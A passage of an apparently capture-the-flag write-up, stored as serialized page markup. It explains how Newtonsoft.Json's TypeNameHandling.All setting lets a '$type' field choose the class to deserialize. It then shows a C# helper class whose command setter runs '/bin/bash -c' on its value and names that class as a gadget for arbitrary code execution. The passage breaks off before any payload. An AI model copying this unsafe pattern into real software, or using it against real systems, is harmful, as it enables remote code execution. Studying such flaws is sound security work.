deserialization\n",{"type":32,"tag":89,"props":3634,"children":3635},{"class":91,"line":211},[3636,3640,3644,3648,3652,3656,3660,3664,3668,3672,3676,3680,3684,3689],{"type":32,"tag":89,"props":3637,"children":3638},{"style":112},[3639],{"type":37,"value":3354},{"type":32,"tag":89,"props":3641,"children":3642},{"style":118},[3643],{"type":37,"value":3329},{"type":32,"tag":89,"props":3645,"children":3646},{"style":124},[3647],{"type":37,"value":156},{"type":32,"tag":89,"props":3649,"children":3650},{"style":159},[3651],{"type":37,"value":2336},{"type":32,"tag":89,"props":3653,"children":3654},{"style":124},[3655],{"type":37,"value":167},{"type":32,"tag":89,"props":3657,"children":3658},{"style":118},[3659],{"type":37,"value":2638},{"type":32,"tag":89,"props":3661,"children":3662},{"style":124},[3663],{"type":37,"value":853},{"type":32,"tag":89,"props":3665,"children":3666},{"style":112},[3667],{"type":37,"value":3354},{"type":32,"tag":89,"props":3669,"children":3670},{"style":124},[3671],{"type":37,"value":3359},{"type":32,"tag":89,"props":3673,"children":3674},{"style":159},[3675],{"type":37,"value":3313},{"type":32,"tag":89,"props":3677,"children":3678},{"style":124},[3679],{"type":37,"value":372},{"type":32,"tag":89,"props":3681,"children":3682},{"style":106},[3683],{"type":37,"value":1385},{"type":32,"tag":89,"props":3685,"children":3686},{"style":112},[3687],{"type":37,"value":3688}," JsonSerializerSettings",{"type":32,"tag":89,"props":3690,"children":3691},{"style":124},[3692],{"type":37,"value":2964},{"type":32,"tag":89,"props":3694,"children":3695},{"class":91,"line":271},[3696,3700,3704,3708,3712],{"type":32,"tag":89,"props":3697,"children":3698},{"style":159},[3699],{"type":37,"value":2382},{"type":32,"tag":89,"props":3701,"children":3702},{"style":124},[3703],{"type":37,"value":156},{"type":32,"tag":89,"props":3705,"children":3706},{"style":159},[3707],{"type":37,"value":2391},{"type":32,"tag":89,"props":3709,"children":3710},{"style":124},[3711],{"type":37,"value":167},{"type":32,"tag":89,"props":3713,"children":3714},{"style":159},[3715],{"type":37,"value":2400},{"type":32,"tag":89,"props":3717,"children":3718},{"class":91,"line":281},[3719],{"type":32,"tag":89,"props":3720,"children":3721},{"style":124},[3722],{"type":37,"value":3723},"});\n",{"type":32,"tag":46,"props":3725,"children":3726},{},[3727],{"type":37,"value":3728},"If we execute the previous code with the TypeNameHandling.All option, we can see that the deserialization is done without any problem, but the output is different.",{"type":32,"tag":74,"props":3730,"children":3731},{"lang":3519},[3732],{"type":32,"tag":79,"props":3733,"children":3735},{"code":3734},"Serialized Person:\n{\"$type\":\"Person, ExampleNameSpace\",\"Name\":\"John\",\"Age\":30}\n",[3736],{"type":32,"tag":85,"props":3737,"children":3738},{"__ignoreMap":7},[3739],{"type":37,"value":3734},{"type":32,"tag":46,"props":3741,"children":3742},{},[3743,3745,3751,3753,3758],{"type":37,"value":3744},"We can see now the json contains an attribute ",{"type":32,"tag":85,"props":3746,"children":3748},{"className":3747},[],[3749],{"type":37,"value":3750},"$type",{"type":37,"value":3752}," with the value of the class followed by its namespace. Then, the elements following ",{"type":32,"tag":85,"props":3754,"children":3756},{"className":3755},[],[3757],{"type":37,"value":3750},{"type":37,"value":3759}," it's the attributes of the class (Name and Age).",{"type":32,"tag":46,"props":3761,"children":3762},{},[3763,3765],{"type":37,"value":3764},"The format of the JSON is different, ",{"type":32,"tag":2804,"props":3766,"children":3767},{},[3768],{"type":37,"value":3769},"but it is important to note that with this unsafe option, it is possible to deserialize the desired class instances.",{"type":32,"tag":46,"props":3771,"children":3772},{},[3773],{"type":37,"value":3774},"So if we recapitulate well, we are able to create a new instance of an object of our choice, and we can also set the values of the attributes of this object.",{"type":32,"tag":46,"props":3776,"children":3777},{},[3778,3780,3786],{"type":37,"value":3779},"If we take a closer look at the ",{"type":32,"tag":85,"props":3781,"children":3783},{"className":3782},[],[3784],{"type":37,"value":3785},"/status",{"type":37,"value":3787}," route, it uses a class that relies on system functions. This class could be interesting for us in our case because if we manage to deserialize an instance of this class, it will then be easy for us to execute arbitrary code.",{"type":32,"tag":74,"props":3789,"children":3790},{"lang":76},[3791],{"type":32,"tag":79,"props":3792,"children":3794},{"code":3793,"language":76,"meta":7,"className":82,"style":7},"[Route(\"/status\")]\n[HttpGet]\npublic IActionResult Status()\n{\n StatusCheckHelper statusCheckHelper = new StatusCheckHelper();\n\n statusCheckHelper.command = \"bash /tmp/cpu.sh\";\n string cpuUsage = statusCheckHelper.output;\n\n statusCheckHelper.command = \"bash /tmp/mem.sh\";\n string memoryUsage = statusCheckHelper.output;\n\n statusCheckHelper.command = \"bash /tmp/disk.sh\";\n string diskUsage = statusCheckHelper.output;\n\n return Content($\"CPU Usage: {cpuUsage}\\nMemory Usage: {memoryUsage}\\nDisk Space: {diskUsage}\");\n}\n",[3795],{"type":32,"tag":85,"props":3796,"children":3797},{"__ignoreMap":7},[3798,3831,3846,3866,3873,3903,3910,3948,3982,3989,4025,4057,4064,4100,4132,4139,4230],{"type":32,"tag":89,"props":3799,"children":3800},{"class":91,"line":92},[3801,3805,3810,3814,3818,3822,3826],{"type":32,"tag":89,"props":3802,"children":3803},{"style":124},[3804],{"type":37,"value":177},{"type":32,"tag":89,"props":3806,"children":3807},{"style":112},[3808],{"type":37,"value":3809},"Route",{"type":32,"tag":89,"props":3811,"children":3812},{"style":124},[3813],{"type":37,"value":357},{"type":32,"tag":89,"props":3815,"children":3816},{"style":180},[3817],{"type":37,"value":183},{"type":32,"tag":89,"props":3819,"children":3820},{"style":186},[3821],{"type":37,"value":3785},{"type":32,"tag":89,"props":3823,"children":3824},{"style":180},[3825],{"type":37,"value":183},{"type":32,"tag":89,"props":3827,"children":3828},{"style":124},[3829],{"type":37,"value":3830},")]\n",{"type":32,"tag":89,"props":3832,"children":3833},{"class":91,"line":102},[3834,3838,3842],{"type":32,"tag":89,"props":3835,"children":3836},{"style":124},[3837],{"type":37,"value":177},{"type":32,"tag":89,"props":3839,"children":3840},{"style":112},[3841],{"type":37,"value":1733},{"type":32,"tag":89,"props":3843,"children":3844},{"style":124},[3845],{"type":37,"value":302},{"type":32,"tag":89,"props":3847,"children":3848},{"class":91,"line":130},[3849,3853,3857,3862],{"type":32,"tag":89,"props":3850,"children":3851},{"style":106},[3852],{"type":37,"value":109},{"type":32,"tag":89,"props":3854,"children":3855},{"style":112},[3856],{"type":37,"value":115},{"type":32,"tag":89,"props":3858,"children":3859},{"style":118},[3860],{"type":37,"value":3861}," Status",{"type":32,"tag":89,"props":3863,"children":3864},{"style":124},[3865],{"type":37,"value":127},{"type":32,"tag":89,"props":3867,"children":3868},{"class":91,"line":139},[3869],{"type":32,"tag":89,"props":3870,"children":3871},{"style":124},[3872],{"type":37,"value":136},{"type":32,"tag":89,"props":3874,"children":3875},{"class":91,"line":211},[3876,3881,3886,3890,3894,3899],{"type":32,"tag":89,"props":3877,"children":3878},{"style":112},[3879],{"type":37,"value":3880}," StatusCheckHelper",{"type":32,"tag":89,"props":3882,"children":3883},{"style":118},[3884],{"type":37,"value":3885}," statusCheckHelper",{"type":32,"tag":89,"props":3887,"children":3888},{"style":124},[3889],{"type":37,"value":156},{"type":32,"tag":89,"props":3891,"children":3892},{"style":106},[3893],{"type":37,"value":1385},{"type":32,"tag":89,"props":3895,"children":3896},{"style":112},[3897],{"type":37,"value":3898}," StatusCheckHelper",{"type":32,"tag":89,"props":3900,"children":3901},{"style":124},[3902],{"type":37,"value":208},{"type":32,"tag":89,"props":3904,"children":3905},{"class":91,"line":271},[3906],{"type":32,"tag":89,"props":3907,"children":3908},{"emptyLinePlaceholder":275},[3909],{"type":37,"value":278},{"type":32,"tag":89,"props":3911,"children":3912},{"class":91,"line":281},[3913,3918,3922,3927,3931,3935,3940,3944],{"type":32,"tag":89,"props":3914,"children":3915},{"style":159},[3916],{"type":37,"value":3917}," statusCheckHelper",{"type":32,"tag":89,"props":3919,"children":3920},{"style":124},[3921],{"type":37,"value":167},{"type":32,"tag":89,"props":3923,"children":3924},{"style":159},[3925],{"type":37,"value":3926},"command",{"type":32,"tag":89,"props":3928,"children":3929},{"style":124},[3930],{"type":37,"value":156},{"type":32,"tag":89,"props":3932,"children":3933},{"style":180},[3934],{"type":37,"value":3169},{"type":32,"tag":89,"props":3936,"children":3937},{"style":186},[3938],{"type":37,"value":3939},"bash /tmp/cpu.sh",{"type":32,"tag":89,"props":3941,"children":3942},{"style":180},[3943],{"type":37,"value":183},{"type":32,"tag":89,"props":3945,"children":3946},{"style":124},[3947],{"type":37,"value":1866},{"type":32,"tag":89,"props":3949,"children":3950},{"class":91,"line":305},[3951,3956,3961,3965,3969,3973,3978],{"type":32,"tag":89,"props":3952,"children":3953},{"style":143},[3954],{"type":37,"value":3955}," string",{"type":32,"tag":89,"props":3957,"children":3958},{"style":118},[3959],{"type":37,"value":3960}," cpuUsage",{"type":32,"tag":89,"props":3962,"children":3963},{"style":124},[3964],{"type":37,"value":156},{"type":32,"tag":89,"props":3966,"children":3967},{"style":159},[3968],{"type":37,"value":3885},{"type":32,"tag":89,"props":3970,"children":3971},{"style":124},[3972],{"type":37,"value":167},{"type":32,"tag":89,"props":3974,"children":3975},{"style":159},[3976],{"type":37,"value":3977},"output",{"type":32,"tag":89,"props":3979,"children":3980},{"style":124},[3981],{"type":37,"value":1866},{"type":32,"tag":89,"props":3983,"children":3984},{"class":91,"line":314},[3985],{"type":32,"tag":89,"props":3986,"children":3987},{"emptyLinePlaceholder":275},[3988],{"type":37,"value":278},{"type":32,"tag":89,"props":3990,"children":3991},{"class":91,"line":331},[3992,3996,4000,4004,4008,4012,4017,4021],{"type":32,"tag":89,"props":3993,"children":3994},{"style":159},[3995],{"type":37,"value":3917},{"type":32,"tag":89,"props":3997,"children":3998},{"style":124},[3999],{"type":37,"value":167},{"type":32,"tag":89,"props":4001,"children":4002},{"style":159},[4003],{"type":37,"value":3926},{"type":32,"tag":89,"props":4005,"children":4006},{"style":124},[4007],{"type":37,"value":156},{"type":32,"tag":89,"props":4009,"children":4010},{"style":180},[4011],{"type":37,"value":3169},{"type":32,"tag":89,"props":4013,"children":4014},{"style":186},[4015],{"type":37,"value":4016},"bash /tmp/mem.sh",{"type":32,"tag":89,"props":4018,"children":4019},{"style":180},[4020],{"type":37,"value":183},{"type":32,"tag":89,"props":4022,"children":4023},{"style":124},[4024],{"type":37,"value":1866},{"type":32,"tag":89,"props":4026,"children":4027},{"class":91,"line":339},[4028,4032,4037,4041,4045,4049,4053],{"type":32,"tag":89,"props":4029,"children":4030},{"style":143},[4031],{"type":37,"value":3955},{"type":32,"tag":89,"props":4033,"children":4034},{"style":118},[4035],{"type":37,"value":4036}," memoryUsage",{"type":32,"tag":89,"props":4038,"children":4039},{"style":124},[4040],{"type":37,"value":156},{"type":32,"tag":89,"props":4042,"children":4043},{"style":159},[4044],{"type":37,"value":3885},{"type":32,"tag":89,"props":4046,"children":4047},{"style":124},[4048],{"type":37,"value":167},{"type":32,"tag":89,"props":4050,"children":4051},{"style":159},[4052],{"type":37,"value":3977},{"type":32,"tag":89,"props":4054,"children":4055},{"style":124},[4056],{"type":37,"value":1866},{"type":32,"tag":89,"props":4058,"children":4059},{"class":91,"line":390},[4060],{"type":32,"tag":89,"props":4061,"children":4062},{"emptyLinePlaceholder":275},[4063],{"type":37,"value":278},{"type":32,"tag":89,"props":4065,"children":4066},{"class":91,"line":398},[4067,4071,4075,4079,4083,4087,4092,4096],{"type":32,"tag":89,"props":4068,"children":4069},{"style":159},[4070],{"type":37,"value":3917},{"type":32,"tag":89,"props":4072,"children":4073},{"style":124},[4074],{"type":37,"value":167},{"type":32,"tag":89,"props":4076,"children":4077},{"style":159},[4078],{"type":37,"value":3926},{"type":32,"tag":89,"props":4080,"children":4081},{"style":124},[4082],{"type":37,"value":156},{"type":32,"tag":89,"props":4084,"children":4085},{"style":180},[4086],{"type":37,"value":3169},{"type":32,"tag":89,"props":4088,"children":4089},{"style":186},[4090],{"type":37,"value":4091},"bash /tmp/disk.sh",{"type":32,"tag":89,"props":4093,"children":4094},{"style":180},[4095],{"type":37,"value":183},{"type":32,"tag":89,"props":4097,"children":4098},{"style":124},[4099],{"type":37,"value":1866},{"type":32,"tag":89,"props":4101,"children":4102},{"class":91,"line":454},[4103,4107,4112,4116,4120,4124,4128],{"type":32,"tag":89,"props":4104,"children":4105},{"style":143},[4106],{"type":37,"value":3955},{"type":32,"tag":89,"props":4108,"children":4109},{"style":118},[4110],{"type":37,"value":4111}," diskUsage",{"type":32,"tag":89,"props":4113,"children":4114},{"style":124},[4115],{"type":37,"value":156},{"type":32,"tag":89,"props":4117,"children":4118},{"style":159},[4119],{"type":37,"value":3885},{"type":32,"tag":89,"props":4121,"children":4122},{"style":124},[4123],{"type":37,"value":167},{"type":32,"tag":89,"props":4125,"children":4126},{"style":159},[4127],{"type":37,"value":3977},{"type":32,"tag":89,"props":4129,"children":4130},{"style":124},[4131],{"type":37,"value":1866},{"type":32,"tag":89,"props":4133,"children":4134},{"class":91,"line":503},[4135],{"type":32,"tag":89,"props":4136,"children":4137},{"emptyLinePlaceholder":275},[4138],{"type":37,"value":278},{"type":32,"tag":89,"props":4140,"children":4141},{"class":91,"line":567},[4142,4147,4151,4155,4160,4165,4169,4174,4178,4182,4187,4191,4196,4200,4204,4209,4213,4218,4222,4226],{"type":32,"tag":89,"props":4143,"children":4144},{"style":143},[4145],{"type":37,"value":4146}," return",{"type":32,"tag":89,"props":4148,"children":4149},{"style":118},[4150],{"type":37,"value":1047},{"type":32,"tag":89,"props":4152,"children":4153},{"style":124},[4154],{"type":37,"value":357},{"type":32,"tag":89,"props":4156,"children":4157},{"style":180},[4158],{"type":37,"value":4159},"$\"",{"type":32,"tag":89,"props":4161,"children":4162},{"style":186},[4163],{"type":37,"value":4164},"CPU Usage: ",{"type":32,"tag":89,"props":4166,"children":4167},{"style":124},[4168],{"type":37,"value":240},{"type":32,"tag":89,"props":4170,"children":4171},{"style":186},[4172],{"type":37,"value":4173},"cpuUsage",{"type":32,"tag":89,"props":4175,"children":4176},{"style":124},[4177],{"type":37,"value":249},{"type":32,"tag":89,"props":4179,"children":4180},{"style":3393},[4181],{"type":37,"value":3396},{"type":32,"tag":89,"props":4183,"children":4184},{"style":186},[4185],{"type":37,"value":4186},"Memory Usage: ",{"type":32,"tag":89,"props":4188,"children":4189},{"style":124},[4190],{"type":37,"value":240},{"type":32,"tag":89,"props":4192,"children":4193},{"style":186},[4194],{"type":37,"value":4195},"memoryUsage",{"type":32,"tag":89,"props":4197,"children":4198},{"style":124},[4199],{"type":37,"value":249},{"type":32,"tag":89,"props":4201,"children":4202},{"style":3393},[4203],{"type":37,"value":3396},{"type":32,"tag":89,"props":4205,"children":4206},{"style":186},[4207],{"type":37,"value":4208},"Disk Space: ",{"type":32,"tag":89,"props":4210,"children":4211},{"style":124},[4212],{"type":37,"value":240},{"type":32,"tag":89,"props":4214,"children":4215},{"style":186},[4216],{"type":37,"value":4217},"diskUsage",{"type":32,"tag":89,"props":4219,"children":4220},{"style":124},[4221],{"type":37,"value":249},{"type":32,"tag":89,"props":4223,"children":4224},{"style":180},[4225],{"type":37,"value":183},{"type":32,"tag":89,"props":4227,"children":4228},{"style":124},[4229],{"type":37,"value":907},{"type":32,"tag":89,"props":4231,"children":4232},{"class":91,"line":640},[4233],{"type":32,"tag":89,"props":4234,"children":4235},{"style":124},[4236],{"type":37,"value":311},{"type":32,"tag":46,"props":4238,"children":4239},{},[4240,4242,4248],{"type":37,"value":4241},"And the ",{"type":32,"tag":85,"props":4243,"children":4245},{"className":4244},[],[4246],{"type":37,"value":4247},"StatusCheckHelper",{"type":37,"value":4249}," class is as follows:",{"type":32,"tag":74,"props":4251,"children":4252},{"lang":76},[4253],{"type":32,"tag":79,"props":4254,"children":4256},{"code":4255,"language":76,"meta":7,"className":82,"style":7},"using System.Diagnostics;\n\nnamespace Nexus_Void.Helpers\n{\n public class StatusCheckHelper\n {\n public string output { get; set; }\n private string _command;\n public string command \n {\n get { return _command; }\n\n set\n {\n _command = value;\n try\n {\n var p = new System.Diagnostics.Process();\n\n var processStartInfo = new ProcessStartInfo()\n {\n WindowStyle = ProcessWindowStyle.Hidden,\n FileName = $\"/bin/bash\",\n WorkingDirectory = \"/tmp\",\n Arguments = $\"-c \\\"{_command}\\\"\",\n RedirectStandardOutput = true,\n RedirectStandardError = true,\n UseShellExecute = false\n };\n p.StartInfo = processStartInfo;\n p.Start();\n output = p.StandardOutput.ReadToEnd();\n }\n [...]\n }\n }\n\n\n }\n}\n",[4257],{"type":32,"tag":85,"props":4258,"children":4259},{"__ignoreMap":7},[4260,4284,4291,4310,4317,4333,4340,4380,4401,4421,4428,4457,4464,4472,4479,4500,4508,4516,4562,4569,4598,4606,4637,4666,4695,4746,4767,4787,4804,4812,4841,4861,4899,4907,4927,4934,4941,4948,4955,4962],{"type":32,"tag":89,"props":4261,"children":4262},{"class":91,"line":92},[4263,4267,4271,4275,4280],{"type":32,"tag":89,"props":4264,"children":4265},{"style":143},[4266],{"type":37,"value":2153},{"type":32,"tag":89,"props":4268,"children":4269},{"style":112},[4270],{"type":37,"value":2877},{"type":32,"tag":89,"props":4272,"children":4273},{"style":124},[4274],{"type":37,"value":167},{"type":32,"tag":89,"props":4276,"children":4277},{"style":112},[4278],{"type":37,"value":4279},"Diagnostics",{"type":32,"tag":89,"props":4281,"children":4282},{"style":124},[4283],{"type":37,"value":1866},{"type":32,"tag":89,"props":4285,"children":4286},{"class":91,"line":102},[4287],{"type":32,"tag":89,"props":4288,"children":4289},{"emptyLinePlaceholder":275},[4290],{"type":37,"value":278},{"type":32,"tag":89,"props":4292,"children":4293},{"class":91,"line":130},[4294,4298,4302,4306],{"type":32,"tag":89,"props":4295,"children":4296},{"style":106},[4297],{"type":37,"value":2211},{"type":32,"tag":89,"props":4299,"children":4300},{"style":112},[4301],{"type":37,"value":2183},{"type":32,"tag":89,"props":4303,"children":4304},{"style":124},[4305],{"type":37,"value":167},{"type":32,"tag":89,"props":4307,"children":4308},{"style":112},[4309],{"type":37,"value":2224},{"type":32,"tag":89,"props":4311,"children":4312},{"class":91,"line":139},[4313],{"type":32,"tag":89,"props":4314,"children":4315},{"style":124},[4316],{"type":37,"value":136},{"type":32,"tag":89,"props":4318,"children":4319},{"class":91,"line":211},[4320,4324,4328],{"type":32,"tag":89,"props":4321,"children":4322},{"style":106},[4323],{"type":37,"value":2239},{"type":32,"tag":89,"props":4325,"children":4326},{"style":106},[4327],{"type":37,"value":2244},{"type":32,"tag":89,"props":4329,"children":4330},{"style":112},[4331],{"type":37,"value":4332}," StatusCheckHelper\n",{"type":32,"tag":89,"props":4334,"children":4335},{"class":91,"line":271},[4336],{"type":32,"tag":89,"props":4337,"children":4338},{"style":124},[4339],{"type":37,"value":758},{"type":32,"tag":89,"props":4341,"children":4342},{"class":91,"line":281},[4343,4347,4351,4356,4360,4364,4368,4372,4376],{"type":32,"tag":89,"props":4344,"children":4345},{"style":106},[4346],{"type":37,"value":2264},{"type":32,"tag":89,"props":4348,"children":4349},{"style":143},[4350],{"type":37,"value":377},{"type":32,"tag":89,"props":4352,"children":4353},{"style":118},[4354],{"type":37,"value":4355}," output",{"type":32,"tag":89,"props":4357,"children":4358},{"style":124},[4359],{"type":37,"value":2986},{"type":32,"tag":89,"props":4361,"children":4362},{"style":106},[4363],{"type":37,"value":2991},{"type":32,"tag":89,"props":4365,"children":4366},{"style":124},[4367],{"type":37,"value":263},{"type":32,"tag":89,"props":4369,"children":4370},{"style":106},[4371],{"type":37,"value":3000},{"type":32,"tag":89,"props":4373,"children":4374},{"style":124},[4375],{"type":37,"value":263},{"type":32,"tag":89,"props":4377,"children":4378},{"style":124},[4379],{"type":37,"value":3009},{"type":32,"tag":89,"props":4381,"children":4382},{"class":91,"line":305},[4383,4388,4392,4397],{"type":32,"tag":89,"props":4384,"children":4385},{"style":106},[4386],{"type":37,"value":4387}," private",{"type":32,"tag":89,"props":4389,"children":4390},{"style":143},[4391],{"type":37,"value":377},{"type":32,"tag":89,"props":4393,"children":4394},{"style":118},[4395],{"type":37,"value":4396}," _command",{"type":32,"tag":89,"props":4398,"children":4399},{"style":124},[4400],{"type":37,"value":1866},{"type":32,"tag":89,"props":4402,"children":4403},{"class":91,"line":314},[4404,4408,4412,4417],{"type":32,"tag":89,"props":4405,"children":4406},{"style":106},[4407],{"type":37,"value":2264},{"type":32,"tag":89,"props":4409,"children":4410},{"style":143},[4411],{"type":37,"value":377},{"type":32,"tag":89,"props":4413,"children":4414},{"style":118},[4415],{"type":37,"value":4416}," command",{"type":32,"tag":89,"props":4418,"children":4419},{"style":295},[4420],{"type":37,"value":2543},{"type":32,"tag":89,"props":4422,"children":4423},{"class":91,"line":331},[4424],{"type":32,"tag":89,"props":4425,"children":4426},{"style":124},[4427],{"type":37,"value":839},{"type":32,"tag":89,"props":4429,"children":4430},{"class":91,"line":339},[4431,4436,4440,4445,4449,4453],{"type":32,"tag":89,"props":4432,"children":4433},{"style":106},[4434],{"type":37,"value":4435}," get",{"type":32,"tag":89,"props":4437,"children":4438},{"style":124},[4439],{"type":37,"value":2986},{"type":32,"tag":89,"props":4441,"children":4442},{"style":143},[4443],{"type":37,"value":4444}," return",{"type":32,"tag":89,"props":4446,"children":4447},{"style":159},[4448],{"type":37,"value":4396},{"type":32,"tag":89,"props":4450,"children":4451},{"style":124},[4452],{"type":37,"value":263},{"type":32,"tag":89,"props":4454,"children":4455},{"style":124},[4456],{"type":37,"value":3009},{"type":32,"tag":89,"props":4458,"children":4459},{"class":91,"line":390},[4460],{"type":32,"tag":89,"props":4461,"children":4462},{"emptyLinePlaceholder":275},[4463],{"type":37,"value":278},{"type":32,"tag":89,"props":4465,"children":4466},{"class":91,"line":398},[4467],{"type":32,"tag":89,"props":4468,"children":4469},{"style":106},[4470],{"type":37,"value":4471}," set\n",{"type":32,"tag":89,"props":4473,"children":4474},{"class":91,"line":454},[4475],{"type":32,"tag":89,"props":4476,"children":4477},{"style":124},[4478],{"type":37,"value":1033},{"type":32,"tag":89,"props":4480,"children":4481},{"class":91,"line":503},[4482,4487,4491,4496],{"type":32,"tag":89,"props":4483,"children":4484},{"style":159},[4485],{"type":37,"value":4486}," _command",{"type":32,"tag":89,"props":4488,"children":4489},{"style":124},[4490],{"type":37,"value":156},{"type":32,"tag":89,"props":4492,"children":4493},{"style":159},[4494],{"type":37,"value":4495}," value",{"type":32,"tag":89,"props":4497,"children":4498},{"style":124},[4499],{"type":37,"value":1866},{"type":32,"tag":89,"props":4501,"children":4502},{"class":91,"line":567},[4503],{"type":32,"tag":89,"props":4504,"children":4505},{"style":143},[4506],{"type":37,"value":4507}," try\n",{"type":32,"tag":89,"props":4509,"children":4510},{"class":91,"line":640},[4511],{"type":32,"tag":89,"props":4512,"children":4513},{"style":124},[4514],{"type":37,"value":4515}," {\n",{"type":32,"tag":89,"props":4517,"children":4518},{"class":91,"line":699},[4519,4524,4529,4533,4537,4541,4545,4549,4553,4558],{"type":32,"tag":89,"props":4520,"children":4521},{"style":106},[4522],{"type":37,"value":4523}," var",{"type":32,"tag":89,"props":4525,"children":4526},{"style":118},[4527],{"type":37,"value":4528}," p",{"type":32,"tag":89,"props":4530,"children":4531},{"style":124},[4532],{"type":37,"value":156},{"type":32,"tag":89,"props":4534,"children":4535},{"style":106},[4536],{"type":37,"value":1385},{"type":32,"tag":89,"props":4538,"children":4539},{"style":112},[4540],{"type":37,"value":2877},{"type":32,"tag":89,"props":4542,"children":4543},{"style":124},[4544],{"type":37,"value":167},{"type":32,"tag":89,"props":4546,"children":4547},{"style":112},[4548],{"type":37,"value":4279},{"type":32,"tag":89,"props":4550,"children":4551},{"style":124},[4552],{"type":37,"value":167},{"type":32,"tag":89,"props":4554,"children":4555},{"style":112},[4556],{"type":37,"value":4557},"Process",{"type":32,"tag":89,"props":4559,"children":4560},{"style":124},[4561],{"type":37,"value":208},{"type":32,"tag":89,"props":4563,"children":4564},{"class":91,"line":752},[4565],{"type":32,"tag":89,"props":4566,"children":4567},{"emptyLinePlaceholder":275},[4568],{"type":37,"value":278},{"type":32,"tag":89,"props":4570,"children":4571},{"class":91,"line":761},[4572,4576,4581,4585,4589,4594],{"type":32,"tag":89,"props":4573,"children":4574},{"style":106},[4575],{"type":37,"value":4523},{"type":32,"tag":89,"props":4577,"children":4578},{"style":118},[4579],{"type":37,"value":4580}," processStartInfo",{"type":32,"tag":89,"props":4582,"children":4583},{"style":124},[4584],{"type":37,"value":156},{"type":32,"tag":89,"props":4586,"children":4587},{"style":106},[4588],{"type":37,"value":1385},{"type":32,"tag":89,"props":4590,"children":4591},{"style":112},[4592],{"type":37,"value":4593}," ProcessStartInfo",{"type":32,"tag":89,"props":4595,"children":4596},{"style":124},[4597],{"type":37,"value":127},{"type":32,"tag":89,"props":4599,"children":4600},{"class":91,"line":833},[4601],{"type":32,"tag":89,"props":4602,"children":4603},{"style":124},[4604],{"type":37,"value":4605}," {\n",{"type":32,"tag":89,"props":4607,"children":4608},{"class":91,"line":842},[4609,4614,4618,4623,4627,4632],{"type":32,"tag":89,"props":4610,"children":4611},{"style":159},[4612],{"type":37,"value":4613}," WindowStyle",{"type":32,"tag":89,"props":4615,"children":4616},{"style":124},[4617],{"type":37,"value":156},{"type":32,"tag":89,"props":4619,"children":4620},{"style":159},[4621],{"type":37,"value":4622}," ProcessWindowStyle",{"type":32,"tag":89,"props":4624,"children":4625},{"style":124},[4626],{"type":37,"value":167},{"type":32,"tag":89,"props":4628,"children":4629},{"style":159},[4630],{"type":37,"value":4631},"Hidden",{"type":32,"tag":89,"props":4633,"children":4634},{"style":124},[4635],{"type":37,"value":4636},",\n",{"type":32,"tag":89,"props":4638,"children":4639},{"class":91,"line":910},[4640,4645,4649,4653,4658,4662],{"type":32,"tag":89,"props":4641,"children":4642},{"style":159},[4643],{"type":37,"value":4644}," FileName",{"type":32,"tag":89,"props":4646,"children":4647},{"style":124},[4648],{"type":37,"value":156},{"type":32,"tag":89,"props":4650,"children":4651},{"style":180},[4652],{"type":37,"value":230},{"type":32,"tag":89,"props":4654,"children":4655},{"style":186},[4656],{"type":37,"value":4657},"/bin/bash",{"type":32,"tag":89,"props":4659,"children":4660},{"style":180},[4661],{"type":37,"value":183},{"type":32,"tag":89,"props":4663,"children":4664},{"style":124},[4665],{"type":37,"value":4636},{"type":32,"tag":89,"props":4667,"children":4668},{"class":91,"line":989},[4669,4674,4678,4682,4687,4691],{"type":32,"tag":89,"props":4670,"children":4671},{"style":159},[4672],{"type":37,"value":4673}," WorkingDirectory",{"type":32,"tag":89,"props":4675,"children":4676},{"style":124},[4677],{"type":37,"value":156},{"type":32,"tag":89,"props":4679,"children":4680},{"style":180},[4681],{"type":37,"value":3169},{"type":32,"tag":89,"props":4683,"children":4684},{"style":186},[4685],{"type":37,"value":4686},"/tmp",{"type":32,"tag":89,"props":4688,"children":4689},{"style":180},[4690],{"type":37,"value":183},{"type":32,"tag":89,"props":4692,"children":4693},{"style":124},[4694],{"type":37,"value":4636},{"type":32,"tag":89,"props":4696,"children":4697},{"class":91,"line":997},[4698,4703,4707,4711,4716,4721,4725,4730,4734,4738,4742],{"type":32,"tag":89,"props":4699,"children":4700},{"style":159},[4701],{"type":37,"value":4702}," Arguments",{"type":32,"tag":89,"props":4704,"children":4705},{"style":124},[4706],{"type":37,"value":156},{"type":32,"tag":89,"props":4708,"children":4709},{"style":180},[4710],{"type":37,"value":230},{"type":32,"tag":89,"props":4712,"children":4713},{"style":186},[4714],{"type":37,"value":4715},"-c ",{"type":32,"tag":89,"props":4717,"children":4718},{"style":3393},[4719],{"type":37,"value":4720},"\\\"",{"type":32,"tag":89,"props":4722,"children":4723},{"style":124},[4724],{"type":37,"value":240},{"type":32,"tag":89,"props":4726,"children":4727},{"style":186},[4728],{"type":37,"value":4729},"_command",{"type":32,"tag":89,"props":4731,"children":4732},{"style":124},[4733],{"type":37,"value":249},{"type":32,"tag":89,"props":4735,"children":4736},{"style":3393},[4737],{"type":37,"value":4720},{"type":32,"tag":89,"props":4739,"children":4740},{"style":180},[4741],{"type":37,"value":183},{"type":32,"tag":89,"props":4743,"children":4744},{"style":124},[4745],{"type":37,"value":4636},{"type":32,"tag":89,"props":4747,"children":4748},{"class":91,"line":1027},[4749,4754,4758,4763],{"type":32,"tag":89,"props":4750,"children":4751},{"style":159},[4752],{"type":37,"value":4753}," RedirectStandardOutput",{"type":32,"tag":89,"props":4755,"children":4756},{"style":124},[4757],{"type":37,"value":156},{"type":32,"tag":89,"props":4759,"children":4760},{"style":143},[4761],{"type":37,"value":4762}," true",{"type":32,"tag":89,"props":4764,"children":4765},{"style":124},[4766],{"type":37,"value":4636},{"type":32,"tag":89,"props":4768,"children":4769},{"class":91,"line":1036},[4770,4775,4779,4783],{"type":32,"tag":89,"props":4771,"children":4772},{"style":159},[4773],{"type":37,"value":4774}," RedirectStandardError",{"type":32,"tag":89,"props":4776,"children":4777},{"style":124},[4778],{"type":37,"value":156},{"type":32,"tag":89,"props":4780,"children":4781},{"style":143},[4782],{"type":37,"value":4762},{"type":32,"tag":89,"props":4784,"children":4785},{"style":124},[4786],{"type":37,"value":4636},{"type":32,"tag":89,"props":4788,"children":4789},{"class":91,"line":1071},[4790,4795,4799],{"type":32,"tag":89,"props":4791,"children":4792},{"style":159},[4793],{"type":37,"value":4794}," UseShellExecute",{"type":32,"tag":89,"props":4796,"children":4797},{"style":124},[4798],{"type":37,"value":156},{"type":32,"tag":89,"props":4800,"children":4801},{"style":143},[4802],{"type":37,"value":4803}," false\n",{"type":32,"tag":89,"props":4805,"children":4806},{"class":91,"line":1080},[4807],{"type":32,"tag":89,"props":4808,"children":4809},{"style":124},[4810],{"type":37,"value":4811}," 